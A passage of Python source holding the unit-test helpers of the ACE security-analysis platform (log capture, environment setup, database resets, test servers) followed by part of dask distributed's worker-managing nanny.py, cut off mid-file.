test_log_sync.release()
def createLock(self):
pass
def emit(self, record):
try:
test_log_messages.append(record)
except:
sys.stderr.write(str(record) + "\n")
def clear(self):
with test_log_sync:
del test_log_messages[:]
def search(self, condition):
"""Searches and returns all log records for which condition(record) was True. Returns the list of LogRecord that matched."""
result = []
with test_log_sync:
for message in test_log_messages:
if condition(message):
result.append(message)
return result
def wait_for_log_entry(self, callback, timeout=5, count=1):
"""Waits for callback to return True count times before timeout seconds expire.
callback takes a single LogRecord object as the parameter and returns a boolean."""
# XXX this is a hack but on slower machines the tests are timing out because the system is slow
if timeout < 30:
timeout = 30
time_limit = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
current_index = 0
current_count = 0
while True:
with test_log_sync:
while current_index < len(test_log_messages):
if callback(test_log_messages[current_index]):
current_count += 1
if current_count == count:
return True
current_index += 1
if datetime.datetime.now() >= time_limit:
raise WaitTimedOutError()
time.sleep(0.1)
def _atexit_callback():
global test_log_manager
if test_log_manager:
try:
test_log_manager.shutdown()
except Exception as e:
print("ERROR: unable to shutdown test log manager: {}".format(e))
def initialize_unittest_logging():
# ACE is multi-process multi-threaded
# so we use this special logging mechanism to keep a central repository of the log events generated
# that the original process can access
global test_log_manager
global test_log_sync
global test_log_messages
global memory_log_handler
test_log_manager = Manager()
atexit.register(_atexit_callback)
test_log_sync = RLock()
test_log_messages = test_log_manager.list()
log_format = logging.Formatter(datefmt='%(asctime)s')
memory_log_handler = MemoryLogHandler()
memory_log_handler.setLevel(logging.DEBUG)
memory_log_handler.setFormatter(log_format)
logging.getLogger().addHandler(memory_log_handler)
def wait_for_log_entry(*args, **kwargs):
return memory_log_handler.wait_for_log_entry(*args, **kwargs)
def log_count(text):
"""Returns the number of times the given text is seen in the logs."""
with test_log_sync:
return len([x for x in test_log_messages if text in x.getMessage()])
def wait_for_log_count(text, count, timeout=5):
"""Waits for text to occur count times in the logs before timeout seconds elapse."""
def condition(e):
return text in e.getMessage()
return memory_log_handler.wait_for_log_entry(condition, timeout, count)
def search_log(text):
return memory_log_handler.search(lambda log_record: text in log_record.getMessage())
def search_log_regex(regex):
return memory_log_handler.search(lambda log_record: regex.search(log_record.getMessage()))
def search_log_condition(func):
return memory_log_handler.search(func)
def splunk_query(search_string, *args, **kwargs):
config = saq.CONFIG['splunk']
q = SplunkQueryObject(
uri=config['uri'],
username=config['username'],
password=config['password'],
*args, **kwargs)
result = q.query(search_string)
return q, result
def initialize_test_environment():
global test_dir
# there is no reason to run anything as root
if os.geteuid() == 0:
print("do not run ace as root please")
sys.exit(1)
# where is ACE?
saq_home = '/opt/saq'
if 'SAQ_HOME' in os.environ:
saq_home = os.environ['SAQ_HOME']
# adjust search path
if os.path.join(saq_home, 'lib') not in sys.path:
sys.path.append(os.path.join(saq_home, 'lib'))
# initialize saq
import saq
saq.initialize(saq_home=saq_home, config_paths=[],
logging_config_path=os.path.join(saq_home, 'etc', 'unittest_logging.ini'),
args=None, relative_dir=None)
if saq.CONFIG['global']['instance_type'] not in [ 'PRODUCTION', 'QA', 'DEV' ]:
sys.stderr.write('\n\n *** CRITICAL ERROR *** \n\ninvalid instance_type setting in configuration\n')
sys.exit(1)
if saq.CONFIG['global']['instance_type'] == 'PRODUCTION':
sys.stderr.write('\n\n *** PROTECT PRODUCTION *** \ndo not execute this in production, idiot\n')
sys.exit(1)
# additional logging required for testing
initialize_unittest_logging()
# create a temporary storage directory
test_dir = os.path.join(saq.SAQ_HOME, 'var', 'test')
if os.path.exists(test_dir):
try:
shutil.rmtree(test_dir)
except Exception as e:
logging.error("unable to delete {}: {}".format(test_dir, e))
sys.exit(1)
try:
os.makedirs(test_dir)
except Exception as e:
logging.error("unable to create temp dir {}: {}".format(test_dir, e))
#initialize_database()
initialized = True
# expected values
EV_TEST_DATE = datetime.datetime(2017, 11, 11, hour=7, minute=36, second=1, microsecond=1)
EV_ROOT_ANALYSIS_TOOL = 'test_tool'
EV_ROOT_ANALYSIS_TOOL_INSTANCE = 'test_tool_instance'
EV_ROOT_ANALYSIS_ALERT_TYPE = 'test_alert'
EV_ROOT_ANALYSIS_DESCRIPTION = 'This is only a test.'
EV_ROOT_ANALYSIS_EVENT_TIME = EV_TEST_DATE
EV_ROOT_ANALYSIS_NAME = 'test'
EV_ROOT_ANALYSIS_UUID = '14ca0ff2-ff7e-4fa1-a375-160dc072ab02'
def create_root_analysis(tool=None, tool_instance=None, alert_type=None, desc=None, event_time=None,
action_counts=None, details=None, name=None, remediation=None, state=None,
uuid=None, location=None, storage_dir=None, company_name=None, company_id=None,
analysis_mode=None):
"""Returns a default RootAnalysis object with expected values for testing."""
return RootAnalysis(tool=tool if tool else EV_ROOT_ANALYSIS_TOOL,
tool_instance=tool_instance if tool_instance else EV_ROOT_ANALYSIS_TOOL_INSTANCE,
alert_type=alert_type if alert_type else EV_ROOT_ANALYSIS_ALERT_TYPE,
desc=desc if desc else EV_ROOT_ANALYSIS_DESCRIPTION,
event_time=event_time if event_time else EV_TEST_DATE,
action_counters=action_counts if action_counts else None,
details=details if details else None,
name=name if name else EV_ROOT_ANALYSIS_NAME,
remediation=remediation if remediation else None,
state=state if state else None,
uuid=uuid if uuid else EV_ROOT_ANALYSIS_UUID,
location=location if location else None,
storage_dir=storage_dir if storage_dir else os.path.relpath(
workload_storage_dir(uuid if uuid else EV_ROOT_ANALYSIS_UUID),
start=saq.SAQ_HOME),
company_name=company_name if company_name else None,
company_id=company_id if company_id else None,
analysis_mode=analysis_mode if analysis_mode else 'test_groups')
class ServerProcess(object):
def __init__(self, args):
self.args = args
self.process = None
self.stdout_reader = None
self.stderr_reader = None
def start(self):
self.process = Popen(self.args, stdout=PIPE, stderr=PIPE, universal_newlines=True)
logging.debug("started process for {} with pid {} args {}".format(
type(self), self.process.pid, ','.join(self.args)))
        self.stdout_reader = threading.Thread(target=self.pipe_reader, args=(self.process.stdout, self.handle_stdout))
self.stdout_reader.daemon = True
self.stdout_reader.start()
        self.stderr_reader = threading.Thread(target=self.pipe_reader, args=(self.process.stderr, self.handle_stderr))
self.stderr_reader.daemon = True
self.stderr_reader.start()
logging.debug("waiting for {} to start...".format(type(self)))
wait_for(self.startup_condition)
logging.debug("{} started".format(type(self)))
def stop(self):
if self.process is None:
return
logging.debug("stopping process {} with pid {}".format(type(self), self.process.pid))
self.process.terminate()
self.process.wait()
self.process = None
logging.debug("stopping process output readers...")
self.stdout_reader.join()
self.stdout_reader = None
self.stderr_reader.join()
self.stderr_reader = None
def handle_stdout(self, line):
#print("STDOUT {}\t{}".format(type(self), line.strip()))
pass
def handle_stderr(self, line):
if '[ERROR]' in line:
print("detected error in subprocess: {}".format(line.strip()))
#print("STDERR {}\t{}".format(type(self), line.strip()))
def pipe_reader(self, pipe, callback):
for line in pipe:
callback(line.strip())
def started(self):
"""Returns True if this process has actually started."""
return True
class EngineProcess(ServerProcess):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.engine_started = False
def startup_condition(self):
return self.engine_started
def handle_stderr(self, line):
if 'engine started' in line:
self.engine_started = True
ServerProcess.handle_stderr(self, line)
class GUIServer(ServerProcess):
def __init__(self):
super().__init__(['python3', 'saq', '-L', 'etc/console_debug_logging.ini', 'start-gui'])
self.saq_init = 0
def handle_stderr(self, line):
if 'SAQ initialized' in line:
self.saq_init += 1
ServerProcess.handle_stderr(self, line)
def startup_condition(self):
return self.saq_init > 1
class ACEBasicTestCase(TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.api_server_process = None
# a list of temporary test files we've created using self.create_test_file
self.tracked_test_files = []
def setUp(self):
#saq.DUMP_TRACEBACKS = True
self.starting_thread_count = threading.active_count()
logging.info("TEST: {}".format(self.id()))
self.save_signal_handlers()
initialize_test_environment()
self.reset()
import saq
saq.db.remove()
open_test_comms()
memory_log_handler.clear()
self.initialize_test_client()
def initialize_test_client(self):
from aceapi import create_app
self.app = create_app(testing=True)
self.app_context = self.app.test_request_context()
self.app_context.push()
self.client = self.app.test_client()
# Hopefully temporary hack to ensure session is cleared after each test
import aceapi
aceapi.db.session.close()
def tearDown(self):
close_test_comms()
# anything logged at CRITICAL log level will cause the test the fail
#self.assertFalse(memory_log_handler.search(lambda e: e.levelno == logging.CRITICAL))
import saq
saq.DUMP_TRACEBACKS = False
self.stop_api_server()
if saq.engine.CURRENT_ENGINE is not None:
try:
saq.engine.CURRENT_ENGINE.stop()
except:
pass
for file_path in self.tracked_test_files:
if os.path.exists(file_path):
os.remove(file_path)
# clear the database session this test used
saq.db.remove()
self.restore_signal_handlers()
# clear all the registered services
import saq.service
saq.service._registered_services = []
thread_count_difference = threading.active_count() - self.starting_thread_count
if thread_count_difference != 0:
logging.warning(f"thread count difference after {self.id()} is {thread_count_difference}")
def create_test_file(self, file_path='.unittest_test_data', file_content=None, root_analysis=None):
"""Creates a test file and returns the path to the newly created file.
Any file created this way is automatically deleted after the test runs.
If file_path is relative then the file is created relative to SAQ_HOME.
        If root_analysis is a RootAnalysis object then file_path is created relative to the storage_dir of this analysis.
If file_content is not None then it is used as the content of the file.
Otherwise, 1024 random bytes are used."""
        if not os.path.isabs(file_path):
            if root_analysis:
                target_file_path = os.path.join(root_analysis.storage_dir, file_path)
            else:
                target_file_path = abs_path(file_path)
        else:
            target_file_path = file_path
mode = 'wb'
if isinstance(file_content, str):
mode = 'w'
with open(target_file_path, mode) as fp:
if file_content:
fp.write(file_content)
else:
fp.write(secrets.token_bytes(1024))
self.tracked_test_files.append(target_file_path)
return file_path
def clear_error_reports(self):
"""Clears out any error reports generated by the test."""
try:
shutil.rmtree(os.path.join(saq.DATA_DIR, 'error_reports'))
os.makedirs(os.path.join(saq.DATA_DIR, 'error_reports'))
except Exception as e:
sys.stderr.write("unable to clear error_reports: {}\n".format(e))
def wait_for_log_entry(self, *args, **kwargs):
try:
return wait_for_log_entry(*args, **kwargs)
except WaitTimedOutError:
return False
def wait_for_condition(self, condition, timeout=5, delay=1):
"""Waits for condition to return True.
condition is checked every delay seconds until it return True or timeout seconds have elapsed."""
time_limit = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
while True:
if condition():
return True
if datetime.datetime.now() > time_limit:
raise WaitTimedOutError()
time.sleep(delay)
def reset(self):
"""Resets everything back to the default state."""
self.reset_config()
self.reset_brocess()
self.reset_cloudphish()
self.reset_correlation()
self.reset_email_archive()
self.reset_crawlphish()
self.reset_log_exports()
self.reset_var_dir()
self.clear_error_reports()
# re-enable encryption in case we disabled it
#saq.ENCRYPTION_PASSWORD = get_aes_key('password')
def reset_var_dir(self):
# clears out the var directory
shutil.rmtree(os.path.join(saq.DATA_DIR, 'var'))
os.mkdir(os.path.join(saq.DATA_DIR, 'var'))
os.mkdir(os.path.join(saq.DATA_DIR, 'var', 'tmp'))
os.mkdir(os.path.join(saq.DATA_DIR, 'var', 'daemon'))
os.mkdir(os.path.join(saq.DATA_DIR, 'var', 'services'))
def reset_log_exports(self):
# reset splunk export logs
splunk_log_dir = os.path.join(saq.DATA_DIR, saq.CONFIG['splunk_logging']['splunk_log_dir'])
if os.path.isdir(splunk_log_dir):
shutil.rmtree(splunk_log_dir)
os.mkdir(splunk_log_dir)
# reset es export logs
es_log_dir = os.path.join(saq.DATA_DIR, saq.CONFIG['elk_logging']['elk_log_dir'])
if os.path.isdir(es_log_dir):
shutil.rmtree(es_log_dir)
os.mkdir(es_log_dir)
def reset_crawlphish(self):
self.whitelist_path = saq.CONFIG['analysis_module_crawlphish']['whitelist_path'] \
= os.path.join('etc', 'crawlphish.unittest.whitelist')
self.regex_path = saq.CONFIG['analysis_module_crawlphish']['regex_path'] \
= os.path.join('etc', 'crawlphish.unittest.regex')
self.blacklist_path = saq.CONFIG['analysis_module_crawlphish']['blacklist_path'] \
= os.path.join('etc', 'crawlphish.unittest.blacklist')
if os.path.exists(self.whitelist_path):
os.remove(self.whitelist_path)
if os.path.exists(self.regex_path):
os.remove(self.regex_path)
if os.path.exists(self.blacklist_path):
os.remove(self.blacklist_path)
with open(self.blacklist_path, 'w') as fp:
fp.write('10.0.0.0/8\n')
fp.write('127.0.0.1\n')
fp.write('localhost.local\n')
with open(self.regex_path, 'w') as fp:
fp.write('\.(pdf|zip|scr|js|cmd|bat|ps1|doc|docx|xls|xlsx|ppt|pptx|exe|vbs|vbe|jse|wsh|cpl|rar|ace|hta)$\n')
with open(self.whitelist_path, 'w') as fp:
fp.write('anonfile.xyz\n')
def reset_config(self):
"""Resets saq.CONFIG."""
saq.load_configuration()
@use_db(name='hal9000')
def reset_hal9000(self, db, c):
c.execute("DELETE FROM observables")
db.commit()
@use_db(name='brocess')
def reset_brocess(self, db, c):
# clear the brocess db
c.execute("""DELETE FROM httplog""")
c.execute("""DELETE FROM smtplog""")
db.commit()
        # TODO instead of using hard-coded values, pull the limits from the config
c.execute("""INSERT INTO httplog ( host, numconnections, firstconnectdate )
VALUES ( 'local', 1000, UNIX_TIMESTAMP(NOW()) ),
( 'xyz', 1000, UNIX_TIMESTAMP(NOW()) ),
( 'test1.local', 70, UNIX_TIMESTAMP(NOW()) ),
( 'test2.local', 69, UNIX_TIMESTAMP(NOW()) )""")
db.commit()
@use_db
def reset_cloudphish(self, db, c):
# clear cloudphish db
c.execute("""DELETE FROM cloudphish_analysis_results""")
c.execute("""DELETE FROM cloudphish_content_metadata""")
db.commit()
# clear cloudphish engine and module cache
for cache_dir in [ saq.CONFIG['cloudphish']['cache_dir'] ]:
if os.path.isdir(cache_dir):
shutil.rmtree(cache_dir)
os.makedirs(cache_dir)
@use_db
def reset_correlation(self, db, c):
global UNITTEST_USER_ID
import saq
data_subdir = os.path.join(saq.CONFIG['global']['data_dir'], saq.SAQ_NODE)
failed_alert_subdir = os.path.join(saq.SAQ_HOME, '.saq_alerts')
subdirs = [ data_subdir, failed_alert_subdir ]
if saq.CONFIG['service_engine']['work_dir']:
subdirs.append(saq.CONFIG['service_engine']['work_dir'])
for subdir in subdirs:
if os.path.isdir(subdir):
try:
shutil.rmtree(subdir)
os.mkdir(subdir)
except Exception as e:
logging.error(f"unable to clear {subdir}: {e}")
c.execute("DELETE FROM alerts")
c.execute("DELETE FROM workload")
c.execute("DELETE FROM observables")
c.execute("DELETE FROM tags")
c.execute("INSERT INTO tags ( `id`, `name` ) VALUES ( 1, 'whitelisted' )")
c.execute("DELETE FROM events")
c.execute("DELETE FROM remediation")
c.execute("DELETE FROM messages")
c.execute("DELETE FROM company WHERE name != 'default'")
c.execute("DELETE FROM nodes WHERE is_local = 1")
c.execute("UPDATE nodes SET is_primary = 0")
c.execute("DELETE FROM locks")
c.execute("DELETE FROM delayed_analysis")
c.execute("DELETE FROM users")
c.execute("DELETE FROM malware")
from app.models import User
u = User()
u.username = 'unittest'
u.email = 'unittest@localhost'
u.password = 'unittest'
c.execute("""
INSERT INTO users ( username, email, password_hash ) VALUES ( %s, %s, %s )""",
(u.username, u.email, u.password_hash))
UNITTEST_USER_ID = c.lastrowid
logging.debug(f"got user id {UNITTEST_USER_ID} for unittest user")
db.commit()
import saq.database
saq.database.initialize_automation_user()
def reset_email_archive(self):
import socket
archive_subdir = os.path.join(saq.DATA_DIR, saq.CONFIG['analysis_module_email_archiver']['archive_dir'],
socket.gethostname().lower())
if os.path.exists(archive_subdir):
try:
shutil.rmtree(archive_subdir)
os.mkdir(archive_subdir)
except Exception as e:
logging.error("unable to clear {}: {}".format(archive_subdir, e))
with get_db_connection('email_archive') as db:
c = db.cursor()
c.execute("DELETE FROM archive")
db.commit()
def start_api_server(self, remote_host=None, ssl_verification=None, listen_address=None, listen_port=None, ssl_cert=None, ssl_key=None):
"""Starts the API server as a separate process."""
self.api_server_process = Process(target=self.execute_api_server, args=(listen_address, listen_port, ssl_cert, ssl_key))
self.api_server_process.start()
if remote_host is None:
remote_host = saq.API_PREFIX
if ssl_verification is None:
ssl_verification = saq.CONFIG['SSL']['ca_chain_path']
import ace_api
result = None
errors = []
for x in range(5):
try:
result = ace_api.ping(remote_host=remote_host, ssl_verification=ssl_verification)
break
except Exception as e:
errors.append(str(e))
time.sleep(1)
if result is None:
for error in errors:
logging.error(error)
self.fail("unable to start api server")
def execute_api_server(self, listen_address=None, listen_port=None, ssl_cert=None, ssl_key=None):
# https://gist.github.com/rduplain/1705072
# this is a bit weird because I want the urls to be the same as they
# are configured for apache, where they are all starting with /api
import aceapi
from saq.database import initialize_database
app = aceapi.create_app(testing=True)
from werkzeug.serving import run_simple
from werkzeug.wsgi import DispatcherMiddleware
from flask import Flask
app.config['DEBUG'] = True
app.config['APPLICATION_ROOT'] = '/api'
application = DispatcherMiddleware(Flask('dummy_app'), {
app.config['APPLICATION_ROOT']: app,
})
if listen_address is None:
listen_address = saq.CONFIG.get('api', 'listen_address')
if listen_port is None:
listen_port = saq.CONFIG.getint('api', 'listen_port')
ssl_context = (
saq.CONFIG.get('api', 'ssl_cert') if ssl_cert is None else ssl_cert,
saq.CONFIG.get('api', 'ssl_key') if ssl_key is None else ssl_key )
initialize_database()
saq.db = aceapi.db.session
logging.info(f"starting api server on {listen_address} port {listen_port}")
run_simple(listen_address, listen_port, application, ssl_context=ssl_context, use_reloader=False)
def stop_api_server(self):
"""Stops the API server if it's running."""
if self.api_server_process is None:
return
import signal
os.kill(self.api_server_process.pid, signal.SIGKILL)
self.api_server_process.join()
self.api_server_process = None
def save_signal_handlers(self):
self.sigterm_handler = signal.getsignal(signal.SIGTERM)
self.sigint_handler = signal.getsignal(signal.SIGINT)
self.sighup_handler = signal.getsignal(signal.SIGHUP)
def restore_signal_handlers(self):
signal.signal(signal.SIGTERM, self.sigterm_handler)
signal.signal(signal.SIGINT, self.sigint_handler)
signal.signal(signal.SIGHUP, self.sighup_handler)
class ACEEngineTestCase(ACEBasicTestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# if we create an engine using self.create_engine() then we track it here
self.tracked_engine = None
self.server_processes = {} # key = name, value ServerProcess
def start_gui_server(self):
self.server_processes['gui'] = GUIServer()
self.server_processes['gui'].start()
def start_cloudphish_server(self):
self.server_processes['cloudphish'] = CloudphishServer()
self.server_processes['cloudphish'].start()
def stop_tracked_engine(self):
if self.tracked_engine:
try:
self.tracked_engine.stop()
self.wait_engine(self.tracked_engine)
except Exception as e:
logging.error("unable to stop tracked engine {}: {}".format(self.tracked_engine, e))
report_exception()
finally:
self.tracked_engine = None
def setUp(self, *args, **kwargs):
super().setUp(*args, **kwargs)
self.disable_all_modules()
def tearDown(self):
ACEBasicTestCase.tearDown(self)
self.stop_tracked_engine()
for key in self.server_processes.keys():
self.server_processes[key].stop()
#if saq.engine.CURRENT_ENGINE:
#try:
#saq.engine.CURRENT_ENGINE.stop()
#except:
#pass
def execute_engine_test(self, engine):
try:
engine.start()
engine.wait()
except KeyboardInterrupt:
engine.stop()
engine.wait()
def create_engine(self, cls, *args, **kwargs):
try:
self.tracked_engine = cls(*args, **kwargs)
return self.tracked_engine
except Exception as e:
logging.error("unable to create engine {}: {}".format(cls, e))
report_exception()
self.fail("unable to create engine {}: {}".format(cls, e))
def start_engine(self, engine):
try:
engine.start()
except Exception as e:
engine.stop()
engine.wait()
self.fail("engine failure: {}".format(e))
def wait_engine(self, engine):
try:
engine.wait()
except Exception as e:
engine.controlled_stop()
engine.wait()
self.fail("engine failure: {}".format(e))
def kill_engine(self, engine):
try:
engine.stop()
engine.wait()
except Exception as e:
self.fail("engine failure: {}".format(e))
def disable_all_modules(self):
"""Disables all the modules specified in the configuration file. Requires a @reset_config."""
for key in saq.CONFIG.keys():
if key.startswith('analysis_module_'):
saq.CONFIG[key]['enabled'] = 'no'
#if key.startswith('analysis_mode_'):
#delete_list = []
#for value in saq.CONFIG[key].keys():
#if value.startswith('analysis_module_'):
#delete_list.append(value)
#for analysis_module in delete_list:
#logging.debug(f"deleting {analysis_module} from {key}")
#del saq.CONFIG[key][analysis_module]
#saq.CONFIG[key]['module_groups'] = ''
logging.debug("disabled all modules")
class CloudphishServer(EngineProcess):
def __init__(self):
super().__init__(['python3', 'saq', '-L', 'etc/console_debug_logging.ini', '--start', 'cloudphish'])
class ACEModuleTestCase(ACEEngineTestCase):
pass
class TestEngine(Engine):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.disable_alerting()
def set_cleanup(self, mode, value):
saq.CONFIG[f'analysis_mode_{mode}']['cleanup'] = 'yes' if value else 'no'
logging.debug(f"set cleanup to {value} for analysis mode {mode}")
|
nanny.py
|
from __future__ import print_function, division, absolute_import
from datetime import timedelta
import logging
from multiprocessing.queues import Empty
import os
import psutil
import shutil
import threading
import uuid
import dask
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError
from tornado.locks import Event
from .comm import get_address_host, get_local_address_for, unparse_host_port
from .core import rpc, RPCClosed, CommClosedError, coerce_to_address
from .metrics import time
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (get_ip, mp_context, silence_logging, json_load_robust,
PeriodicCallback)
from .worker import _ncores, run, parse_memory_limit, Worker
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
""" A process to manage worker processes
    The nanny spins up Worker processes, watches them, and kills or restarts
them as necessary.
"""
process = None
status = None
def __init__(self, scheduler_ip=None, scheduler_port=None,
scheduler_file=None, worker_port=0, ncores=None, loop=None,
local_dir='dask-worker-space', services=None, name=None,
memory_limit='auto', reconnect=True, validate=False, quiet=False,
resources=None, silence_logs=None, death_timeout=None, preload=(),
preload_argv=[], security=None, contact_address=None,
listen_address=None, worker_class=None, env=None, **kwargs):
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg['address']
elif scheduler_ip is None and dask.config.get('scheduler-address'):
self.scheduler_addr = dask.config.get('scheduler-address')
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
self._given_worker_port = worker_port
self.ncores = ncores or _ncores
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = death_timeout
self.preload = preload
self.preload_argv = preload_argv
self.Worker = Worker if worker_class is None else worker_class
self.env = env or {}
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get('distributed.worker.memory.terminate')
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args('worker')
self.listen_args = self.security.get_listen_args('worker')
self.local_dir = local_dir
self.loop = loop or IOLoop.current()
self.scheduler = rpc(self.scheduler_addr, connection_args=self.connection_args)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.ncores)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {'instantiate': self.instantiate,
'kill': self.kill,
'restart': self.restart,
# cannot call it 'close' on the rpc side for naming conflict
'terminate': self._close,
'run': self.run}
super(Nanny, self).__init__(handlers, io_loop=self.loop,
connection_args=self.connection_args,
**kwargs)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100, io_loop=self.loop)
self.periodic_callbacks['memory'] = pc
self._listen_address = listen_address
self.status = 'init'
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.ncores)
@gen.coroutine
def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (gen.TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
try:
yield gen.with_timeout(timedelta(seconds=timeout),
self.scheduler.unregister(address=self.worker_address),
quiet_exceptions=allowed_errors)
except allowed_errors:
pass
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@gen.coroutine
def _start(self, addr_or_port=0):
""" Start nanny, start local process, start watching """
# XXX Factor this out
if not addr_or_port:
# Default address is the required one to reach the scheduler
self.listen(get_local_address_for(self.scheduler.address),
listen_args=self.listen_args)
self.ip = get_address_host(self.address)
elif isinstance(addr_or_port, int):
# addr_or_port is an integer => assume TCP
self.ip = get_ip(
get_address_host(self.scheduler.address)
)
self.listen((self.ip, addr_or_port),
listen_args=self.listen_args)
else:
self.listen(addr_or_port, listen_args=self.listen_args)
self.ip = get_address_host(self.address)
logger.info(' Start Nanny at: %r', self.address)
response = yield self.instantiate()
if response == 'running':
assert self.worker_address
self.status = 'running'
else:
yield self._close()
self.start_periodic_callbacks()
def start(self, addr_or_port=0):
self.loop.add_callback(self._start, addr_or_port)
@gen.coroutine
def kill(self, comm=None, timeout=2):
""" Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
raise gen.Return('OK')
deadline = self.loop.time() + timeout
yield self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
yield self._unregister(deadline - self.loop.time())
@gen.coroutine
def instantiate(self, comm=None):
""" Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(host,
self._given_worker_port)
if self.process is None:
self.process = WorkerProcess(
worker_args=(self.scheduler_addr,),
worker_kwargs=dict(ncores=self.ncores,
local_dir=self.local_dir,
services=self.services,
service_ports={'nanny': self.port},
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address),
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit,
worker=self.Worker,
env=self.env,
)
self.auto_restart = True
if self.death_timeout:
try:
result = yield gen.with_timeout(
timedelta(seconds=self.death_timeout),
self.process.start()
)
except gen.TimeoutError:
yield self._close(timeout=self.death_timeout)
raise gen.Return('timed out')
else:
result = yield self.process.start()
raise gen.Return(result)
@gen.coroutine
def restart(self, comm=None, timeout=2, executor_wait=True):
start = time()
@gen.coroutine
def _():
if self.process is not None:
yield self.kill()
yield self.instantiate()
try:
yield gen.with_timeout(timedelta(seconds=timeout), _())
except gen.TimeoutError:
logger.error("Restart timed out, returning before finished")
raise gen.Return('timed out')
else:
raise gen.Return('OK')
def memory_monitor(self):
""" Track worker's memory. Restart if it goes above terminate fraction """
if self.status != 'running':
return
process = self.process.process
if process is None:
return
try:
proc = psutil.Process(process.pid)
except psutil.NoSuchProcess:
return
memory = proc.memory_info().rss
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning("Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.status == 'running'
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
@gen.coroutine
def _on_exit(self, exitcode):
if self.status not in ('closing', 'closed'):
try:
yield self.scheduler.unregister(address=self.worker_address)
except (EnvironmentError, CommClosedError):
if not self.reconnect:
yield self._close()
return
try:
if self.status not in ('closing', 'closed'):
if self.auto_restart:
logger.warning("Restarting worker")
yield self.instantiate()
except Exception:
logger.error("Failed to restart worker after its process exited",
exc_info=True)
@property
def pid(self):
return self.process and self.process.pid
@gen.coroutine
def _close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status in ('closing', 'closed'):
raise gen.Return('OK')
self.status = 'closing'
logger.info("Closing Nanny at %r", self.address)
self.stop()
try:
if self.process is not None:
yield self.kill(timeout=timeout)
except Exception:
pass
self.process = None
self.rpc.close()
self.scheduler.close_rpc()
self.status = 'closed'
raise gen.Return('OK')
class WorkerProcess(object):
def __init__(self, worker_args, worker_kwargs, worker_start_args,
silence_logs, on_exit, worker, env):
self.status = 'init'
self.silence_logs = silence_logs
self.worker_args = worker_args
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
@gen.coroutine
def start(self):
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == 'running':
raise gen.Return(self.status)
if self.status == 'starting':
yield self.running.wait()
raise gen.Return(self.status)
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
kwargs=dict(worker_args=self.worker_args,
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env),
)
self.process.daemon = True
self.process.set_exit_callback(self._on_exit)
self.running = Event()
self.stopped = Event()
self.status = 'starting'
yield self.process.start()
msg = yield self._wait_until_connected(uid)
if not msg:
raise gen.Return(self.status)
self.worker_address = msg['address']
self.worker_dir = msg['dir']
assert self.worker_address
self.status = 'running'
self.running.set()
init_q.close()
raise gen.Return(self.status)
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode,)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode,)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return (self.process.pid
if self.process and self.process.is_alive()
else None)
def mark_stopped(self):
if self.status != 'stopped':
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.warning(msg)
self.status = 'stopped'
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
